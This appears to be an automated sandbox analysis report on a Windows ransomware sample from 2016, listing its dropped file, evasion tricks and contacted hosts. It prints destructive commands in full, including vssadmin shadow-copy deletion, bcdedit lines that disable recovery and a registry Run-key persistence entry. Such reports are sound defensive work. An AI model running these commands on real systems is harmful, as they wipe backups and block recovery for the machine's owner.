PE file has an executable .text section and no other executable section
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads software policies
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknown | Process created: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: unknown | Process created: C:\Users\admin\AppData\Roaming\amhfnhe45.exe
Source: unknown | Process created: C:\Windows\System32\cmd.exe
Source: unknown | Process created: C:\Windows\System32\reg.exe
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Process created: C:\Users\admin\AppData\Roaming\amhfnhe45.exe C:\Users\admin\AppData\Roaming\amhfnhe45.exe
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL C:\94-61F~1.EXE
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v game342 /t REG_SZ /d C:\Users\admin\AppData\Roaming\amhfnhe45.exe /f
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootems off
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess created: C:\Windows\System32\vssadmin.exe C:\Windows\System32\vssadmin.exe delete shadows /all /Quiet
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} advancedoptions off
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} optionsedit off
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} recoveryenabled off
Uses an in-process (OLE) Automation server
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E436EBB3-524F-11CE-9F53-0020AF0BA770}\InprocServer32
Creates mutexes
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeMutant created: \Sessions\1\BaseNamedObjects\12393578327533451
Reads the hosts file
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile read: C:\Windows\System32\drivers\etc\hosts
Sample file name is different from the original file name gathered from version info
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: OriginalFilename vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: OriginalFilenameTODO: <Original filename>J vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: OriginalFilenameQ-Dir.exe vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: OriginalFilenameMMDevAPI.Dll.MUIj% vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: OriginalFilenamewdmaud.drv.muij% vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: System.OriginalFileName vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: originalfilename vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: OriginalFilenameQ-Dir.exe vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Sample reads its own file content
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeFile read: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Uses reg.exe to modify the Windows registry
Source: unknownProcess created: C:\Windows\System32\reg.exe
PE file contains more sections than normal
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeStatic PE information: Number of sections : 11 > 10
Source: amhfnhe45.exe.2732.drStatic PE information: Number of sections : 11 > 10

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to create a new security descriptor
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_0041F040 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,SHGetFolderPathW,SHGetFolderPathW,CoCreateInstance,ExitProcess,CoCreateInstance,ExitProcess,LoadLibraryW,LoadStringW,LoadStringW,LoadStringW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetSpecialFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,GetModuleFileNameW,DeleteFileW,LookupPrivilegeValueA,GetLastError,GetVersionExW,CreateThread,SetThreadPriority,0_2_0041F040
May try to detect the Windows Explorer process (often used for injection)
Source: amhfnhe45.exeBinary or memory string: Progman
Source: amhfnhe45.exeBinary or memory string: Program Manager
Source: amhfnhe45.exeBinary or memory string: Shell_TrayWnd
Contains functionality to launch a program with higher privileges
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_0041E880 GetEnvironmentVariableW,ShellExecuteExW,ShellExecuteExW,GetLastError,Sleep,GetLastError,Sleep,ShellExecuteExW,CloseHandle,0_2_0041E880

Anti Debugging:

Contains functionality to register its own exception handler
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_0042C13E SetUnhandledExceptionFilter,0_2_0042C13E
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_004256FE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004256FE
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_00426F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00426F58
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_1_0042C13E SetUnhandledExceptionFilter,0_1_0042C13E
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_1_004256FE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_1_004256FE
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_1_00426F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_1_00426F58
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_2_0042C13E SetUnhandledExceptionFilter,1_2_0042C13E
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_2_004256FE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_004256FE
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_2_00426F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00426F58
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_1_0042C13E SetUnhandledExceptionFilter,1_1_0042C13E
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_1_004256FE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_1_004256FE
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_1_00426F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_1_00426F58
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeSystem information queried: KernelDebuggerInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_004256FE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004256FE
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_2_0041C8F0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,1_2_0041C8F0
Contains functionality to dynamically determine API calls
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_0042D4E5 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0042D4E5
Contains functionality to read the PEB
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_001A0000 mov eax, dword ptr fs:[00000030h] 0_2_001A0000
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_001A0000 mov ecx, dword ptr fs:[00000030h] 0_2_001A0000
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_001A0408 mov eax, dword ptr fs:[00000030h] 0_2_001A0408
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_2_00170000 mov eax, dword ptr fs:[00000030h] 1_2_00170000
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_2_00170000 mov ecx, dword ptr fs:[00000030h] 1_2_00170000
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_2_00170408 mov eax, dword ptr fs:[00000030h] 1_2_00170408
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_00413E50 GetProcessHeap,GetFileAttributesW,SetFileAttributesW,CreateFileW,GetFileSize,HeapAlloc,ReadFile,CloseHandle,HeapFree,CloseHandle,HeapFree,HeapFree,CloseHandle,HeapAlloc,HeapFree,HeapFree,HeapFree,CloseHandle,SetFilePointer,WriteFile,HeapFree,HeapFree,HeapFree,CloseHandle,WriteFile,WriteFile,FlushFileBuffers,CloseHandle,MoveFileExW,GetLastError,DeleteFileW,Sleep,HeapFree,HeapFree,HeapFree,0_2_00413E50
Enables debug privileges
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeProcess token adjusted: Debug
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess token adjusted: Debug

Malware Analysis System Evasion:

Contains functionality to enumerate / list files inside a directory
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_00413AB0 FindFirstFileW,FindNextFileW,FindClose,0_2_00413AB0
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_1_00413AB0 FindFirstFileW,FindNextFileW,FindClose,0_1_00413AB0
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_2_00413AB0 FindFirstFileW,FindNextFileW,FindClose,1_2_00413AB0
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_1_00413AB0 FindFirstFileW,FindNextFileW,FindClose,1_1_00413AB0
Contains functionality to query local drives
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_00413840 GetLogicalDriveStringsW,GetVolumeInformationW,GetDriveTypeW,GetVolumeInformationW,ExitThread,0_2_00413840
Queries a list of all running processes
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess information queried: ProcessInformation
Checks the free space of harddrives
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_2_0041C8F0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,1_2_0041C8F0
Enumerates the file system
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile opened: C:\Documents and Settings\admin\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile opened: C:\Documents and Settings\admin\AppData\Local\Adobe\Acrobat\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile opened: C:\Documents and Settings\admin\AppData\Local\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile opened: C:\Documents and Settings\admin\AppData\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile opened: C:\Documents and Settings\admin\AppData\Local\Adobe\Acrobat\11.0\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile opened: C:\Documents and Settings\admin\AppData\Local\Adobe\
Found dropped PE file which has not been started or loaded
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeDropped PE file which has not been started: C:\Users\admin\AppData\Roaming\amhfnhe45.exe
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_1-16791
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_0-16978
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_0-16762
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe TID: 2764Thread sleep time: -60000ms >= -60000ms
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe TID: 3192Thread sleep count: 309 > 30
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe TID: 3192Thread sleep time: -61800ms >= -60000ms
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe TID: 3196Thread sleep count: 178 > 30
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe TID: 3196Thread sleep time: -71200ms >= -60000ms
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe TID: 3216Thread sleep time: -60000ms >= -60000ms
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe TID: 3216Thread sleep time: -60000ms >= -60000ms
Source: C:\Windows\System32\vssadmin.exe TID: 3020Thread sleep time: -60000ms >= -60000ms
Source: C:\Windows\System32\svchost.exe TID: 3084Thread sleep time: -60000ms >= -60000ms
Accesses Audio hardware information via COM
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\TreatAs
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\TreatAs
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\Progid
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\Progid
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocServer32
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocServer32
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler32
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler32
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\TreatAs
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\TreatAs
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\Progid
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\Progid
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocServer32
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocServer32
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler32
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler32
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess information set: NOOPENFILEERRORBOX
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_0041C8F0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,0_2_0041C8F0
Deletes itself after installation
Source: C:\Windows\System32\cmd.exeFile deleted: c:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

Lowering of HIPS / PFW / Operating System Security Settings:

Overwrites Mozilla Firefox settings
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile written: C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\help_recover_instructions+uuk.txt
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile written: C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\help_recover_instructions+uuk.html

Language, Device and Operating System Detection:

Contains functionality to query local / system time
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_00425DE6 GetSystemTimeAsFileTime,0_2_00425DE6
Contains functionality to query windows version
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_0041F040 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,SHGetFolderPathW,SHGetFolderPathW,CoCreateInstance,ExitProcess,CoCreateInstance,ExitProcess,LoadLibraryW,LoadStringW,LoadStringW,LoadStringW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetSpecialFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,GetModuleFileNameW,DeleteFileW,LookupPrivilegeValueA,GetLastError,GetVersionExW,CreateThread,SetThreadPriority,0_2_0041F040
Queries the cryptographic machine GUID
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeQueries volume information: C:\ VolumeInformation

Behavior Graph (rendered graph not reproduced; node and edge data recovered from the graph text)

Behavior Graph ID: 125244
Sample: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Startdate: 12/05/2016
Architecture: WINDOWS
Score: 76

Processes:
  • 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe (started by main): dropped amhfnhe45.exe (PE32); started amhfnhe45.exe and cmd.exe
  • amhfnhe45.exe: started reg.exe, bcdedit.exe, vssadmin.exe (4 further processes hidden: processes exceeded maximum capacity for this level)
  • cmd.exe: Deletes itself after installation
  • svchost.exe (started by main)

Signatures on 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe: Accesses Audio hardware information via COM
Signatures on amhfnhe45.exe: Accesses Audio hardware information via COM; Deletes shadow drive data (may be related to ransomware); 4 further signatures hidden (signatures exceeded maximum capacity for this level)

Connected hosts (from amhfnhe45.exe; 2 further connected IPs hidden):
  • ip.tyk.nu 144.76.253.225 HetznerOnlineAG Germany
  • partaci.info 176.106.190.60 RadioLANspolsro Slovakia (SLOVAK Republic)
  • topdrivers.org 185.24.99.98 32bitTransitionAS United Kingdom
No Yara matches